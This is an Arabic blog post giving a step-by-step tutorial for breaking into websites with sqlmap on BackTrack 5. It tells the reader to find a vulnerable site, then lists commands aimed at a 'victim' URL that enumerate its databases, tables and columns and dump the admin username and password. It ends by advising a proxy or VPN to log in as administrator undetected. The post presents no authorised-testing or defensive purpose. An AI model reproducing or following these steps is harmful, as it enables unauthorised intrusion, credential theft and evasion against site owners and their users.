بحث

Responsive Ads Here

إختراق المواقع بإستخدام الباك تراك 5 (sqlmap)

السلام عليكم ورحمة الله وبركاته

اليوم سنقوم بشرح أداة رائعة موجودة بالباك تراك 5 وهى أداة sqlmap.py SQL التلقائي الذي يساعدك على الإختراق الموقع بسهولة. اتبع الخطوات البسيطة الإختراق الموقع باستخدام backtrak 5

1. نفتح اباكتراك ونكتب cd /pentest/database/sqlmap وبهذا بإن أداة sqlmap مفتوحة !


2. الآن العثور على موقع مصاب. (وأيضا لدي موقع مصاب)


3. الآن اكتب هذا الأمر  واضغط على enter. 

python sqlmap.py -u http://yourvictim'slink/index.php?id=4 –dbs

4. الآن سوف تحصل على اسم قاعدة البيانات للموقع !




حسنا أنا حصلت على اثنين من قاعدة بيانات AJ وinformation_schema سوف نقوم بتحديد قاعدة بيانات.

5. الآن الحصول على جداول قاعدة البيانات. لذلك تحتاج إلى إدخال هذا الأمر وإضغط enter.

python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D  (database name) –tables

6. الآن نحن بحاجة للاستيلاء على الجداول من قاعدة البيانات AJ. لصق هذا الأمر أدناه وإضغط enter.


python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables
 

 

7. الآن سوف تحصل على قائمة الجداول التي يتم تخزينها في قاعدة البيانات AJ



8. الآن أصبح بإمكانك الاستيلاء على أعمدة من الجدول الإدارة

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns 



الآن حصلنا على الأعمدة وحصلنا على اسم المستخدم وكلمة المرور9. الآن يتيح الاستيلاء على كلمات السر من admin

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test --dump

الآن حصلنا على اسم المستخدم وكلمة المرور للموقع!



الآن بمجرد العثور على معلومات الإدارة للموقع واستخدام بروكسي/ VPN وسيثم الدخول في الموقع باعتبارك admin.

ليست هناك تعليقات:

إرسال تعليق

√مدونةكل ما يخصك√

مَرحبًا بِجَمِيِع زُوَّاِر مُدَوَّنَةِ كُل مَا يَخُصُّك أَتَمَنَّى لَكُمْ قضَاءَ وَقْتٍ مُمْتِعٍ مَعَنا لاَ تَنْسُو مُشَارَكَةَ اْلٌمَوَاضِيع مِنْ أَجْلِ تَعْمِيمِ اْلٌفَائِدَةِ وَشُكْرًا لكُمْ